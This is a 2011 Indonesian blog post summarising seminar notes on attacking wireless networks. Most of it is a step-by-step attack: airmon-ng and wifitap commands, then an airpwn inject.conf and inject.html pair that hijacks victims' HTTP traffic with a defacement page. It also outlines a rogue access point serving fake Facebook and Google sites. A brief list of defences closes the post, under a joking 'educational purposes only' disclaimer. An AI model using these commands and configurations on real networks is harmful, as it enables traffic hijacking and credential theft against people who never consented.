Selasa, 18 Januari 2011

Wireless Hacking dan Penanganannya

Posted on 11.55 by fadhly

Secara ga sengaja saya waktu beres beres kamar nemu handout  yang waktu dulu pernah ikut seminar "wireless hacking dan penanganannya" di maranatha. jadi ga ada salahnya disini saya share, For Educational & Research Purpose Only ya.. pemateri nya adalah om irvan, kira kira garis besar dan langkah langkah wireless hacking adalah sebagai berikut.


Pertama sekali kenapa kita menyerang wireless?? menyerang wireless itu karena semua orang bisa akses wireless, wireless itu sama seperti meletakkan sebuah switch di suatu tempat terbuka. nah, untuk tools yang diperlukan antara lain:




  • Notebook x86 Based

  • GNU/Linux Operating System

  • Wifi Card yang support mode monitoring (biasanya atheros/ralink)

  • Kismet

  • Aircrack-NG

  • Wifitap

  • Airpwn


Untuk menemukan sebuah jaringan wifi bisa scanning secara manual, atau menggunakan kismet atau menggunakan linux wireless tools. banyak wireless yang di setup dengan menggunakan kunci seperti WEP, setup wifi dengan metode ini tidak baik dan bisa diserang langsung. apa toolsnya? aircrack-ng


Bagaimana menyerang client tanpa asosiasi? kita bisa menggunakan wifitap download dan install. jalankan perintah :


 



[plain]
#airmon-ng stop ath0
#airmon-ng start wifi0 <channel>
# iwlist ath0 scanning
#wifitap.py -b <BSSID> -i  ath0 -o ath0
#ifconfig wj0 192.168.1.10 mtu 1400
#ifconfig wj0
[/plain]

kemudian coba ping dan scan target.


untuk melakukan hijacking packet, sniff paket menggunakan packet sniffer (misalnya wireshark). kemudian buat dua file, inject.conf dan inject.html, isinya sperti ini:


inject.conf:


 



[plain]
begin inject.html
match ^(GET|POST)
ignore ^GET [^ ?]+\. (jpg|jpeg|gif|png|tif|tiff)
response inject.html
[/plain]

inject.html


 



[plain]
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html</p>
<p style="text-align: justify;"><html><head><title> Hacked By: Clinkz</title></head><body>
<h1 align="center">This Wireless Network is PWNED by Clinkz </h1>
</body></html>
[/plain]

Langkah selanjutnya ganti mode wireless di laptop menjadi mode monitoring


 



[plain]
# airmon-ng stop ath0
# airmon-ng start wifi0 <channel>
[/plain]

Kemnudian Jalankan Airpwn:


 



[plain]
# airpwn -v -v -v -c inject.conf -d madwifi -i ath0
[/plain]

kalau sudah kebajak seperti ini, silahkan untuk lebih usil nya setup akses point palsu.. :D caranya gampang:




  • ganti wireless card jadi mode AP

  • setup DHCP server di laptop kita

  • setup dns server di laptop kita

  • setup webserver di laptop kita

  • buat beberapa situs palsu (misal: facebook.com/google.com dll) padahal di laptop kita


Kesimpulannya?

  • Jangan Pernah menggunakan jaringan yang tidak dipercaya untuk mengakses data pribadi yang penting

  • jangan pernah setup wireless access point menggunakan WEP

  • Gunakan Enkripsi yang lebih baik (misal: ipsec, dll)

  • Gunakan Metode kunci yang lebih baik dari WEP/WPA (misalnya: captive portal/RADIUS)

  • Gunakan VPN untuk solusi keamanan yang lebih baik


Sekian, Mudah mudahan bermanfaat.. ;) inget ya, FOR EDUCATIONAL/RESEARCH PURPOSE ONLY...!! coba2 usil, ketangkep saya ga bertanggung jawab.. :D
Categories: , , ,

1 komentar:

Langganan: Posting Komentar (Atom)